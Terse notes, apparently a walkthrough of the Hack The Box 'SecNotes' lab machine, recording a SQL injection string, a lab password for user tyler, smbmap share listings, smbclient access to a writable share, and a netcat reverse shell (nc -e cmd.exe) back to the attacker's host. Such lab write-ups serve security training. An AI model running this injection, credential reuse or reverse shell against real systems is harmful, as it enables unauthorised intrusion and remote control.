HTB SECNOTES

sql injection with ' or '1'='1 and in the notes we find:

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

smbmap -d secnotes.htb -u tyler -p '92g!mA8BGjOirkL%OG*&' -H 10.10.10.97
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.97...
[+] IP: 10.10.10.97:445 Name: 10.10.10.97                                       
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    READ ONLY
        new-site                                                READ, WRITE

smbclient -U tyler -L //10.10.10.97

smbclient -U tyler //10.10.10.97/new-site
	!nc -nv myIp 4444 -e cmd.exe
